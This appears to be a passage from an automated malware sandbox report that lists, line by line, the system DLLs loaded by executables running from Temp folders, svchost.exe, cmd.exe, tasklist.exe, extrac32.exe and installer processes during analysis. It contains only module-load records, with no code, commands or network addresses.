Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: uxtheme.dll
